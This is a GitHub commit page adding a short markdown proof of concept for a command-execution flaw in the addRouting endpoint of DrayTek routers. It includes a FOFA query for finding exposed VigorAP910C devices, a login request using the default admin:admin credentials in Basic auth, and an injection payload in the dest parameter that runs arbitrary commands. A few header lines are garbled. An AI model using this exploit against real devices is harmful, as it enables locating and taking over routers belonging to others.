Skip to content

Commit

Permalink
Create draytek路由器addrouting命令执行漏洞.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@wy876
wy876 authored Apr 27, 2024
1 parent 51ba575 commit c8c687d
Showing 1 changed file with 24 additions and 0 deletions.
24 changes: 24 additions & 0 deletions draytek路由器addrouting命令执行漏洞.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
## draytek路由器addrouting命令执行漏洞

## fofa
```
header="realm="VigorAP910C"
```


## poc
```
获取token
GET /opmode.asp HTTP/1.1
Host:
Authorization: Basic YWRtaW46YWRtaW4=
Referer:{{Hostname}}
ser-Agent: Mozilla/5.0 - |
执行命令
GET /goform/addRouting?AuthStr={{token}}&dest=||+echo+$(+{{rce}})%3b%23a HTTP/1.1
Host:
Authorization: Basic YWRtaW46YWRtaW4= R
eferer:{{Hostname}}
User-Agent: Mozilla/5.0
```

0 comments on commit c8c687d

Please sign in to comment.